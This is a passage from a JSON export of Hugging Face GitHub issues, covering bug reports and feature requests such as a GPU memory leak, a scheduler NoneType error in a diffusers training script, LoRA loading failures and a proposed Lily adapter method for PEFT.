I'm not familiar enough with the code to know how to determine the commit hash from which the in-memory dataset card was loaded.\n\n### Steps to reproduce the bug\n\nSee above.\n\n### Expected behavior\n\nConcurrent edits to disjoint configs of a dataset should never corrupt the dataset schema.\n\n### Environment info\n\n- `datasets` version: 2.20.0\n- Platform: Linux-5.15.0-118-generic-x86_64-with-glibc2.35\n- Python version: 3.10.14\n- `huggingface_hub` version: 0.30.2\n- PyArrow version: 19.0.1\n- Pandas version: 2.2.2\n- `fsspec` version: 2023.9.0", "url": "https://github.com/huggingface/datasets/issues/7600", "state": "closed", "labels": [], "created_at": "2025-06-07T17:28:56Z", "updated_at": "2025-07-31T10:00:50Z", "comments": 4, "user": "sharvil" }, { "repo": "huggingface/lerobot", "number": 1226, "title": "404 Not Found", "body": "[lerobot](https://github.com/huggingface/lerobot/tree/main)/[examples](https://github.com/huggingface/lerobot/tree/main/examples)\n/10_use_so100.md/ \n\nThis is supposed to be a tutorial but cannot be opened???\n404 Not Found!!!\n", "url": "https://github.com/huggingface/lerobot/issues/1226", "state": "closed", "labels": [ "documentation", "question" ], "created_at": "2025-06-07T09:02:37Z", "updated_at": "2025-06-08T21:26:07Z", "user": "luk-e158" }, { "repo": "huggingface/transformers", "number": 38656, "title": "Potential Memory Leak or Caching in Fast Image Processor", "body": "### System Info\n\nHi team,\n\nThank you for your great work on `transformers`!\n\nWhile using the `AutoProcessor` with `use_fast=True`, I noticed that there seems to be a memory leak or possibly some form of persistent caching when processing images. Even after deleting the processor and clearing the CUDA cache, approximately 600MB of GPU memory remains occupied.\n\nHere is a minimal reproducible example:\n\n```python\nfrom transformers import AutoProcessor\nfrom PIL import Image\nimport time\nimport torch\nimport requests\nfrom io import BytesIO\n\nprocessor = AutoProcessor.from_pretrained(\n \"Qwen/Qwen2.5-VL-7B-Instruct\",\n use_fast=True,\n trust_remote_code=False,\n revision=None,\n)\n\nurl = \"https://github.com/sgl-project/sglang/blob/main/test/lang/example_image.png?raw=true\"\nresponse = requests.get(url)\nimages = [Image.open(BytesIO(response.content)).convert(\"RGB\")]\n\nresult = processor(\n text=[\n \"<|im_start|>system\\nYou are a helpful assistant.<|im_end|>\\n\"\n \"<|im_start|>user\\nWhat\u2019s in this image?<|vision_start|><|image_pad|><|vision_end|><|im_end|>\\n\"\n \"<|im_start|>assistant\\n\"\n ],\n padding=True,\n return_tensors=\"pt\",\n images=images,\n device=\"cuda\"\n)\n\ndel result\ndel processor\ntorch.cuda.empty_cache()\n\nprint(\"You can now use nvidia-smi to observe GPU memory usage, which is around 600MB.\")\nwhile True:\n time.sleep(60)\n```\n\nI\u2019d like to kindly ask:\n\n1. If this is due to caching, is there a way to control or disable the cache?\n2. 
If this is an unintended memory leak, would it be possible to investigate and potentially fix it?\n\nThanks again for your help and time!\n\nBest regards\n\n### Who can help?\n\ntokenizers: @ArthurZucker and @itazap\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nAs provided above.\n\n### Expected behavior\n\nIt would be great if caching could be made optional, or if there could be an option to avoid any GPU memory usage entirely.", "url": "https://github.com/huggingface/transformers/issues/38656", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-07T08:46:48Z", "updated_at": "2025-08-12T13:02:37Z", "comments": 8, "user": "yhyang201" }, { "repo": "huggingface/transformers", "number": 38654, "title": "The visualization of image input in Qwen2.5-VL", "body": "The image input of Qwen2.5-VL is processed by the processor and then saved as a tensor in inputs['pixel_values'].\nI tried to restore the image using the tensor in inputs['pixel_values'], but the restored image patches were out of order.\nSo how can I properly restore the image from inputs['pixel_values']?\n\nFor example, the original input image is as follows.\n![Image](https://github.com/user-attachments/assets/f40dd6e7-0774-4ad1-b921-73adc320a880)\nAnd here is the failed restoration from inputs['pixel_values'].\n![Image](https://github.com/user-attachments/assets/e1c9c0ff-d02a-49b0-af21-e98d080452d8)", "url": "https://github.com/huggingface/transformers/issues/38654", "state": "closed", "labels": [], "created_at": "2025-06-07T08:15:44Z", "updated_at": "2025-06-10T09:04:04Z", "comments": 2, "user": "Bytes-Lin" }, { "repo": "huggingface/lerobot", "number": 1223, "title": "smolvla introduces an asynchronous inference stack decoupling perception and action prediction?", "body": "Why is this not implemented in the code?", "url": "https://github.com/huggingface/lerobot/issues/1223", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-06-07T01:23:24Z", "updated_at": "2025-06-08T21:25:04Z", "user": "zmf2022" }, { "repo": "huggingface/transformers", "number": 38650, "title": "Support of Qwen3 GGUF model", "body": "Hi, I am getting the following error when I want to use the GGUF model with Qwen3:\n\"ValueError: GGUF model with architecture qwen3 is not supported yet.\"\n\nI have the latest transformers and gguf 0.17.0:\n```\nself.tokenizer = AutoTokenizer.from_pretrained(model_name, gguf_file= \"Qwen3-0.6B-Q2_K_L.gguf\",use_fast=True)\n if self.tokenizer.pad_token is None:\n self.tokenizer.pad_token = \"\"\n self.tokenizer.add_special_tokens({\"pad_token\": \"\"})\n self.tokenizer.padding_side = \"left\"\n self.model = AutoModelForCausalLM.from_pretrained(\n model_name,\n gguf_file = \"Qwen3-0.6B-Q2_K_L.gguf\",\n pad_token_id=self.tokenizer.pad_token_id,\n trust_remote_code=True,\n torch_dtype=torch.bfloat16,\n device_map=\"auto\",\n )\n```\nHow can I use the GGUF model of Qwen3 with transformers? 
Could you please add support for it?\n\nThanks!", "url": "https://github.com/huggingface/transformers/issues/38650", "state": "closed", "labels": [], "created_at": "2025-06-06T20:11:23Z", "updated_at": "2025-07-15T08:02:59Z", "comments": 2, "user": "Auth0rM0rgan" }, { "repo": "huggingface/diffusers", "number": 11675, "title": "Error in loading the pretrained lora weights", "body": "Hi, I am using the script https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_lora_sdxl.py to train a LoRA.\n\nAn error is raised on https://github.com/huggingface/diffusers/blob/73a9d5856f2d7ae3637c484d83cd697284ad3962/examples/text_to_image/train_text_to_image_lora_sdxl.py#L1314C9-L1314C52\n\n```\nLoading adapter weights from state_dict led to missing keys in the model: down_blocks.1.attentions.0.transformer_blocks.0.attn1.to_q.lora_A\n.default_0.weight, down_blocks.1.attentions.0.transformer_blocks.0.attn1.to_q.lora_B.default_0.weight, ...\n```\n\nThe difference between the keys in the saved LoRA weights and the \"missing keys\" mentioned above is \"default_0\". How can I resolve this problem?\n\ndiffusers 0.32.2\npeft 0.15.2\n", "url": "https://github.com/huggingface/diffusers/issues/11675", "state": "closed", "labels": [], "created_at": "2025-06-06T17:09:45Z", "updated_at": "2025-06-07T07:40:14Z", "comments": 1, "user": "garychan22" }, { "repo": "huggingface/text-generation-inference", "number": 3257, "title": "If using chat.completions, text+image inference returns incorrect output because of a template issue", "body": "### System Info\n\nCommon on all platforms\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\ntext-generation-launcher --model-id=llava-hf/llava-v1.6-mistral-7b-hf --max-input-tokens 4096 --max-batch-prefill-tokens 16384 --max-total-tokens 8192 --max-batch-size 4\n\nclient:\n\n```\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:80/v1\", api_key=\"-\")\n\nchat_completion = client.chat.completions.create(\n model=\"tgi\",\n messages=[\n {\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"image_url\",\n \"image_url\": {\n \"url\": \"https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/transformers/rabbit.png\"\n },\n },\n {\"type\": \"text\", \"text\": \"Whats in this image?\"},\n ],\n },\n ],\n max_tokens=50,\n temperature=0.0,\n stream=False,\n)\n\nprint(chat_completion)\n\n```\n\n### Expected behavior\n\nThe incorrect output is:\nChatCompletion(id='', choices=[Choice(finish_reason='stop', index=0, logprobs=None, message=ChatCompletionMessage(content=\" I'm sorry, but I'm not sure what you're asking. Can you please provide more context or information about what you're looking for? 
", refusal=None, role='assistant', audio=None, function_call=None, tool_calls=None))], created=1749197214, model='llava-hf/llava-v1.6-mistral-7b-hf', object='chat.completion', service_tier=None, system_fingerprint='3.3.1-dev0-native', usage=CompletionUsage(completion_tokens=35, prompt_tokens=8, total_tokens=43, completion_tokens_details=None, prompt_tokens_details=None))\n\n", "url": "https://github.com/huggingface/text-generation-inference/issues/3257", "state": "open", "labels": [], "created_at": "2025-06-06T13:06:20Z", "updated_at": "2025-06-06T13:11:22Z", "comments": 2, "user": "sywangyi" }, { "repo": "huggingface/nanotron", "number": 372, "title": "datatrove needs numpy>=2.0.0 but nanotron 0.4 requires numpy<2, how to fix?", "body": "", "url": "https://github.com/huggingface/nanotron/issues/372", "state": "open", "labels": [], "created_at": "2025-06-06T12:12:39Z", "updated_at": "2025-11-22T14:44:01Z", "user": "lxyyang" }, { "repo": "huggingface/transformers", "number": 38613, "title": "MDX Errors", "body": "### System Info\n\nUbuntu 24.04.2 LTS, CPython 3.11.12, transformers==4.53.0.dev0\n\n\n@stevhliu I'm trying to contribute to the model cards. I forked the latest transformers, ran the scripts from the home page, and then went to the documents page. I'm having issues with the doc builder. I keep receiving the errors \"ValueError: There was an error when converting docs/source/en/internal/generation_utils.md to the MDX format.\nUnable to find generation.TFGreedySearchEncoderDecoderOutput in transformers. Make sure the path to that object is correct.\" and \"Unable to find image_processing_utils_fast.BaseImageProcessorFast in transformers. Make sure the path to that object is correct.\"\n\nI ran `pip install -e \".[dev]\"` and saw this after installing everything: \"warning: The package `transformers @ file://s` does not have an extra named `docs`\"\n\nI ran the doc builder and that ran as expected until I ran the doc-builder command \"doc-builder build transformers docs/source/en/ --build_dir ~/tmp/test-build\"\n\nIs there something that I'm misunderstanding? Is there a workaround, in the meantime, for me to write the markdown of the card I have been assigned without having to run those scripts? 
Thank you!\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRan install scripts on the Documents folder\n\n### Expected behavior\n\nTo generate the docs", "url": "https://github.com/huggingface/transformers/issues/38613", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-05T14:19:45Z", "updated_at": "2025-06-06T20:12:36Z", "comments": 7, "user": "rileyafox" }, { "repo": "huggingface/diffusers", "number": 11661, "title": "[BUG]: Using args.max_train_steps even if it is None in diffusers/examples/flux-control", "body": "### Describe the bug\n\nUnder [examples/flux-control](https://github.com/huggingface/diffusers/tree/main/examples/flux-control) there are two files showing how to fine-tune flux-control:\n\n- [train_control_flux.py](https://github.com/huggingface/diffusers/blob/main/examples/flux-control/train_control_flux.py)\n- [train_control_lora_flux.py](https://github.com/huggingface/diffusers/blob/main/examples/flux-control/train_control_lora_flux.py)\n\nBoth of them have a bug when args.max_train_steps is None. Starting from [Line 905](https://github.com/huggingface/diffusers/blob/c934720629837257b15fd84d27e8eddaa52b76e6/examples/flux-control/train_control_flux.py#L905) we have the following code:\n```.py\nif args.max_train_steps is None:\n len_train_dataloader_after_sharding = math.ceil(len(train_dataloader) / accelerator.num_processes)\n num_update_steps_per_epoch = math.ceil(len_train_dataloader_after_sharding / args.gradient_accumulation_steps)\n num_training_steps_for_scheduler = (\n args.num_train_epochs * num_update_steps_per_epoch * accelerator.num_processes\n )\n else:\n num_training_steps_for_scheduler = args.max_train_steps * accelerator.num_processes\n\n lr_scheduler = get_scheduler(\n args.lr_scheduler,\n optimizer=optimizer,\n num_warmup_steps=args.lr_warmup_steps * accelerator.num_processes,\n num_training_steps=args.max_train_steps * accelerator.num_processes,\n num_cycles=args.lr_num_cycles,\n power=args.lr_power,\n )\n```\nNote how the if checks whether `args.max_train_steps` is None and prepares num_training_steps_for_scheduler for that case. 
However, in [Line 918](https://github.com/huggingface/diffusers/blob/c934720629837257b15fd84d27e8eddaa52b76e6/examples/flux-control/train_control_flux.py#L918) we use `args.max_train_steps`\n```.py\n num_training_steps=args.max_train_steps * accelerator.num_processes,\n```\ninstead of the prepared num_training_steps_for_scheduler, causing the following error:\n```.sh\nnum_training_steps=args.max_train_steps * accelerator.num_processes,\n ~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~\nTypeError: unsupported operand type(s) for *: 'NoneType' and 'int'\n```\n\n### Reproduction\n\nTraining runs where max_train_steps is not set, i.e.:\n```.sh\naccelerate launch train_control_lora_flux.py \\\n --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-dev\" \\\n --dataset_name=\"raulc0399/open_pose_controlnet\" \\\n --output_dir=\"pose-control-lora\" \\\n --mixed_precision=\"bf16\" \\\n --train_batch_size=1 \\\n --rank=64 \\\n --gradient_accumulation_steps=4 \\\n --gradient_checkpointing \\\n --use_8bit_adam \\\n --learning_rate=1e-4 \\\n --report_to=\"wandb\" \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=0 \\\n --num_train_epochs=10 \\\n --validation_image=\"openpose.png\" \\\n --validation_prompt=\"A couple, 4k photo, highly detailed\" \\\n --offload \\\n --seed=\"0\" \\\n --push_to_hub\n```\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNot relevant for the mentioned bug.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11661", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-05T07:18:06Z", "updated_at": "2025-06-05T09:26:26Z", "comments": 0, "user": "Markus-Pobitzer" }, { "repo": "huggingface/lerobot", "number": 1203, "title": "Could you please upload the config.json file for smolvla?", "body": "\n\nCould you please upload the config.json file for smolvla? Thank you very much!\n\n\nFileNotFoundError: config.json not found on the HuggingFace Hub in lerobot/smolvla_base\n\n", "url": "https://github.com/huggingface/lerobot/issues/1203", "state": "closed", "labels": [ "question" ], "created_at": "2025-06-05T06:59:12Z", "updated_at": "2025-06-11T14:56:56Z", "user": "Pandapan01" }, { "repo": "huggingface/transformers", "number": 38601, "title": "Contribute to Transformers on Windows natively without WSL", "body": "### System Info\n\n### System info\nOS: Windows 11\nPython: 3.13.3 and 3.10\nGit: 2.49.0\nCMake: 4.0.2\nMsys64: Pacman v6.1.0 - libalpm v14.0.0\nPip: 25.1.1 \nSetuptools: 80.9.0\nVisual studio C++ build tools\n\n### NOTE: I followed the steps here [Contribute to \ud83e\udd17 Transformers](https://huggingface.co/docs/transformers/en/contributing); the system info above already existed before following them, but let me walk through the steps again for additional info.\n1- Forked the repo.\n2- Cloned it\n3- cd transformers (so made sure I am in the right path, which is the root of the repo)\n4- Switched to my own branch\n5- Made a python virtual environment using python 3.10, then activated it\n6- Made sure transformers isn't installed inside it\n7- Installed PyTorch\n8- Ran this command `pip install -e \".[dev]\"`\n\n\n### NOTE: I tried making a requirements.txt and using the command `pip install -r requirements.txt`, but I got no output. I also tried installing onnx with pip, which succeeded, then ran `pip install -e \".[dev]\"` again, but nothing changed\n\n### NOTE 6/6/2025: I tried uv instead of python venv, nothing worked. 
I tried deleting everything, including the system info above, and installing everything from the beginning; still nothing worked. I made a requirements.txt from what is in setup.py, installed it, and tried to run `pip install -e \".[dev]\"`, but got the same issues again; nothing worked\n\n```\n error: subprocess-exited-with-error\n\n \u00d7 python setup.py egg_info did not run successfully.\n \u2502 exit code: 1\n \u2570\u2500> [11 lines of output]\n ...\\setup.py:36: DeprecationWarning: Use shutil.which instead of find_executable\n CMAKE = find_executable('cmake3') or find_executable('cmake')\n ...\\setup.py:37: DeprecationWarning: Use shutil.which instead of find_executable\n MAKE = find_executable('make')\n fatal: not a git repository (or any of the parent directories): .git\n Traceback (most recent call last):\n File \"\", line 2, in \n File \"\", line 35, in \n File \"...\\setup.py\", line 318, in \n raise FileNotFoundError(\"Unable to find \" + requirements_file)\n FileNotFoundError: Unable to find requirements.txt\n [end of output]\n\n note: This error originates from a subprocess, and is likely not a problem with pip.\nerror: metadata-generation-failed\n\n\u00d7 Encountered error while generating package metadata.\n\u2570\u2500> See above for output.\n\nnote: This is an issue with the package mentioned above, not pip.\nhint: See above for details.\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n`pip install -e \".[dev]\"`\n\n### Expected behavior\n\nBeing able to install transformers for contributing with no issue", "url": "https://github.com/huggingface/transformers/issues/38601", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-05T04:14:12Z", "updated_at": "2025-07-27T08:02:54Z", "comments": 4, "user": "ghost" }, { "repo": "huggingface/diffusers", "number": 11657, "title": "Custom Wan diffusion Lora runs without error but doesn't apply effect and gives warning: No LoRA keys associated to WanTransformer3DModel found with the prefix='transformer'.", "body": "### Describe the bug\n\nI run the diffusers pipeline using the standard process with a custom diffusers-trained LoRA: \n\npipe = WanPipeline.from_pretrained(model_id, vae=vae, torch_dtype=torch.bfloat16)\npipe.scheduler = scheduler\npipe.load_lora_weights(\"lora/customdiffusers_lora.safetensors\")\netc...\n\nIt runs without error, but the effect is not applied, and I see the following warning: \nNo LoRA keys associated to WanTransformer3DModel found with the prefix='transformer'. This is safe to ignore if LoRA state dict didn't originally have any WanTransformer3DModel related params. You can also try specifying `prefix=None` to resolve the warning. Otherwise, open an issue if you think it's unexpected: https://github.com/huggingface/diffusers/issues/new\n\nIs there any config file I need to change for this to work? 
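In the meantime, this is how I checked which prefixes the checkpoint keys actually carry (a diagnostic sketch using safetensors):\n\n```python\nfrom safetensors import safe_open\n\n# The loader looks for keys namespaced under \"transformer.\" for\n# WanTransformer3DModel; list the top-level prefixes present in the file.\nwith safe_open(\"lora/customdiffusers_lora.safetensors\", framework=\"pt\") as f:\n    prefixes = sorted({key.split(\".\")[0] for key in f.keys()})\nprint(prefixes)\n```\n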
Thanks\n\n### Reproduction\n\nN/A, as it is a custom LoRA\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n0.33, linux, python 3.10\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/11657", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-04T19:50:14Z", "updated_at": "2025-09-12T03:32:17Z", "comments": 3, "user": "st-projects-00" }, { "repo": "huggingface/transformers", "number": 38576, "title": "A local variable 'image_seq_length' leading to UnboundLocalError: cannot access local variable 'image_seq_length' where it is not associated with a value", "body": "### System Info\n\n- `transformers` version: 4.52.3\n- Platform: Linux-5.15.0-125-generic-x86_64-with-glibc2.35\n- Python version: 3.12.2\n- Huggingface_hub version: 0.32.2\n- Safetensors version: 0.5.3\n- Accelerate version: 0.26.0\n- Accelerate config: not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.6.0+cu124 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA GeForce RTX 4090\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe code snippet is as follows:\n```python\nfrom transformers.utils.attention_visualizer import AttentionMaskVisualizer\n\nvisualizer = AttentionMaskVisualizer(\"meta-llama/Llama-2-7b-hf\")\nvisualizer(\"Plants create energy through a process known as\")\n```\n\nIn the class AttentionMaskVisualizer, a local variable defined in the first branch (lines 181-201), 'image_seq_length', is passed to the function (line 232). 
However, in the text case, the branch will not be executed, and it will lead to UnboundLocalError: cannot access local variable 'image_seq_length' where it is not associated with a value.\n\n### Expected behavior\n\nNone", "url": "https://github.com/huggingface/transformers/issues/38576", "state": "closed", "labels": [ "bug" ], "created_at": "2025-06-04T09:06:04Z", "updated_at": "2025-06-04T12:20:33Z", "user": "IceGiraffe" }, { "repo": "huggingface/lerobot", "number": 1195, "title": "ros2_control support", "body": "Hello,\n\nI was thinking that it would be great to use the robot with ros2_control:\n\n- to test code developed with the ROS2 framework;\n- for education purposes: the robot is great, easy and inexpensive to build (thank you for the work achieved), transportable in a case, etc.\n\nDo you have any knowledge of an existing project?\nIf not, would you be interested in this kind of implementation?\n\nBest,\nAline", "url": "https://github.com/huggingface/lerobot/issues/1195", "state": "open", "labels": [ "enhancement", "question" ], "created_at": "2025-06-03T15:31:53Z", "updated_at": "2025-11-27T16:30:08Z", "user": "baaluidnrey" }, { "repo": "huggingface/diffusers", "number": 11648, "title": "How to load LoRA weights with an fp8 transformer model?", "body": "Hi, I want to run FluxControlPipeline with an fp8 transformer, referencing the code: \nhttps://huggingface.co/docs/diffusers/api/pipelines/flux#quantization\n\n```\nimport torch\nfrom diffusers import BitsAndBytesConfig as DiffusersBitsAndBytesConfig, FluxTransformer2DModel, FluxControlPipeline\nfrom transformers import BitsAndBytesConfig as BitsAndBytesConfig, T5EncoderModel\n\nquant_config = BitsAndBytesConfig(load_in_8bit=True)\ntext_encoder_8bit = T5EncoderModel.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n subfolder=\"text_encoder_2\",\n quantization_config=quant_config,\n torch_dtype=torch.float16,\n)\n\nquant_config = DiffusersBitsAndBytesConfig(load_in_8bit=True)\ntransformer_8bit = FluxTransformer2DModel.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n subfolder=\"transformer\",\n quantization_config=quant_config,\n torch_dtype=torch.float16,\n)\n\npipeline = FluxControlPipeline.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n text_encoder_2=text_encoder_8bit,\n transformer=transformer_8bit,\n torch_dtype=torch.float16,\n device_map=\"balanced\",\n)\n\nprompt = \"a tiny astronaut hatching from an egg on the moon\"\nimage = pipeline(prompt, guidance_scale=3.5, height=768, width=1360, num_inference_steps=50).images[0]\nimage.save(\"flux.png\")\n```\n\nbut when I load the LoRA after building the pipeline\n\n```\npipeline = FluxControlPipeline.from_pretrained(\n \"black-forest-labs/FLUX.1-dev\",\n text_encoder_2=text_encoder_8bit,\n transformer=transformer_8bit,\n torch_dtype=torch.float16,\n device_map=\"balanced\",\n)\n\npipeline.load_lora_weights(\"black-forest-labs/FLUX.1-Depth-dev-lora\")\n```\nthere is an error:\nnot support fp8 weight\nHow can I fix it?\n\n", "url": "https://github.com/huggingface/diffusers/issues/11648", "state": "open", "labels": [], "created_at": "2025-06-03T10:31:23Z", "updated_at": "2025-06-19T12:37:35Z", "user": "Johnson-yue" }, { "repo": "huggingface/candle", "number": 2986, "title": "How to reset gradient before each batch", "body": "In PyTorch, you would call `optimizer.zero_grad` to zero the gradients before every batch. 
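For reference, the PyTorch pattern I mean is roughly this (a minimal sketch with a dummy model and loss):\n\n```python\nimport torch\n\nmodel = torch.nn.Linear(4, 1)\noptimizer = torch.optim.SGD(model.parameters(), lr=0.1)\n\nfor batch in (torch.randn(8, 4) for _ in range(3)):\n    optimizer.zero_grad()              # clear gradients accumulated from the previous batch\n    loss = model(batch).pow(2).mean()  # dummy loss\n    loss.backward()                    # populate .grad on each parameter\n    optimizer.step()                   # apply the update\n```\n\n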
How do you do this in candle?", "url": "https://github.com/huggingface/candle/issues/2986", "state": "open", "labels": [], "created_at": "2025-06-03T10:17:52Z", "updated_at": "2025-06-03T10:17:52Z", "user": "lokxii" }, { "repo": "huggingface/transformers", "number": 38544, "title": "Paligemma model card needs update", "body": "Hi \n\nI found a minor problem with the PaliGemma model card. How can I raise a PR to fix it? I am a first-time contributor. I raised a PR. Whom should I mention to review it? \nhttps://huggingface.co/google/paligemma-3b-pt-896", "url": "https://github.com/huggingface/transformers/issues/38544", "state": "closed", "labels": [], "created_at": "2025-06-03T06:55:14Z", "updated_at": "2025-07-14T16:23:52Z", "comments": 7, "user": "punitvara" }, { "repo": "huggingface/transformers", "number": 38541, "title": "`eager_attention_forward` and `repeat_kv` code duplication", "body": "I see the two functions appear in a lot of places in the code base. Shall we unify them into a single place?\n\nAnd can we treat `eager_attention_forward` as another option in [`ALL_ATTENTION_FUNCTIONS`](https://github.com/huggingface/transformers/blob/main/src/transformers/modeling_utils.py#L6186)? Any concerns?", "url": "https://github.com/huggingface/transformers/issues/38541", "state": "closed", "labels": [], "created_at": "2025-06-03T00:57:16Z", "updated_at": "2025-06-10T10:27:25Z", "comments": 3, "user": "ChengLyu" }, { "repo": "huggingface/chat-ui", "number": 1843, "title": "can you make a release?", "body": "The current codebase is far ahead of the official release from November; maybe you can stabilize and release the current code?", "url": "https://github.com/huggingface/chat-ui/issues/1843", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-06-02T21:26:51Z", "updated_at": "2025-07-21T20:44:03Z", "comments": 1, "user": "antonkulaga" }, { "repo": "huggingface/transformers", "number": 38527, "title": "Why do you remove sample_indices_fn for processor.apply_chat_template?", "body": "Just as shown in the picture, since 4.52 processor.apply_chat_template no longer supports sample_indices_fn, but the args doc is still there. \n\n\"Image\"", "url": "https://github.com/huggingface/transformers/issues/38527", "state": "closed", "labels": [], "created_at": "2025-06-02T12:34:23Z", "updated_at": "2025-06-03T02:44:22Z", "comments": 1, "user": "futrime" }, { "repo": "huggingface/optimum", "number": 2284, "title": "Error when exporting DinoV2 with Registers", "body": "When trying:\n\n` python -m scripts.convert --quantize --model_id facebook/dinov2-with-registers-small`\n\nI got: \n\n`ValueError: Trying to export a dinov2-with-registers model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. 
Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type dinov2-with-registers to be supported natively in the ONNX export.`", "url": "https://github.com/huggingface/optimum/issues/2284", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-06-02T08:53:55Z", "updated_at": "2025-07-04T02:16:54Z", "comments": 1, "user": "elkizana" }, { "repo": "huggingface/agents-course", "number": 523, "title": "[QUESTION] The final quiz of Unit 1, always crashes with dataset not found", "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer you can ask here, please **be specific**.\n\nDataset 'agents-course/unit_1_quiz' doesn't exist on the Hub or cannot be accessed. \n\nThe full log is: \n\n```\nTraceback (most recent call last):\n File \"/home/user/app/app.py\", line 28, in \n ds = load_dataset(EXAM_DATASET_ID, split=\"train\")\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 2129, in load_dataset\n builder_instance = load_dataset_builder(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1849, in load_dataset_builder\n dataset_module = dataset_module_factory(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1719, in dataset_module_factory\n raise e1 from None\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1645, in dataset_module_factory\n raise DatasetNotFoundError(f\"Dataset '{path}' doesn't exist on the Hub or cannot be accessed.\") from e\ndatasets.exceptions.DatasetNotFoundError: Dataset 'agents-course/unit_1_quiz' doesn't exist on the Hub or cannot be accessed.\nTraceback (most recent call last):\n File \"/home/user/app/app.py\", line 28, in \n ds = load_dataset(EXAM_DATASET_ID, split=\"train\")\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 2129, in load_dataset\n builder_instance = load_dataset_builder(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1849, in load_dataset_builder\n dataset_module = dataset_module_factory(\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1719, in dataset_module_factory\n raise e1 from None\n File \"/usr/local/lib/python3.10/site-packages/datasets/load.py\", line 1645, in dataset_module_factory\n raise DatasetNotFoundError(f\"Dataset '{path}' doesn't exist on the Hub or cannot be accessed.\") from e\ndatasets.exceptions.DatasetNotFoundError: Dataset 'agents-course/unit_1_quiz' doesn't exist on the Hub or cannot be accessed.\n ```\n\nAm I missing something trivial? \n", "url": "https://github.com/huggingface/agents-course/issues/523", "state": "open", "labels": [ "question" ], "created_at": "2025-06-02T07:58:01Z", "updated_at": "2025-06-02T07:58:01Z", "user": "abcnishant007" }, { "repo": "huggingface/peft", "number": 2563, "title": "Integrate Lily", "body": "### Feature request\n\nThis request proposes integrating Lily (Low-Rank Interconnected Adaptation across Layers), accepted to ACL 2025 Findings, into the PEFT library. \nPaper: https://arxiv.org/pdf/2407.09946 \nRepo: https://github.com/yibozhong/lily \n\n\n### Motivation\n\nLily aims to directly make the rank of each individual adapter bigger under the same parameter budget, as it's shown in many papers that higher ranks are beneficial to PEFT performance. This is achieved by breaking the pair-AB-per-layer constraint of LoRA. 
That is, we do not give each layer a dedicated pair of A and B. Rather, we decouple all the Bs from the layer, and when adapting at each layer, we use a weighted sum of these Bs as the B for this layer. The weight is calculated by a lightweight trainable router, currently data-dependent. \n\n![Image](https://github.com/user-attachments/assets/809c25a4-63f5-4ec7-bdb4-98a8f869f328) \n\nSeveral points worth noting: \n- The method looks somewhat similar to MosLoRA in structure, but it operates at the model level and the aim is to increase the individual rank of each adapter with dynamic adaptation. \n- Currently in the paper, we use a data-dependent router, which makes it tricky to merge the weights. I do not observe notable inference latency, possibly due to small model size, but an option for using a non-data-dependent router can be included to enable easy merging of the weights. \n- The current As are still positioned at a fixed layer (using layer-wise sharing to reduce params). However, it can also be decoupled, simply by providing two routers for weighting As and Bs respectively, rather than one router for B in the current setup. This is a more elegant design and shares the same principle as Lily. After I run quick experiments demonstrating its effectiveness, I can integrate this setup into my current code as Lily 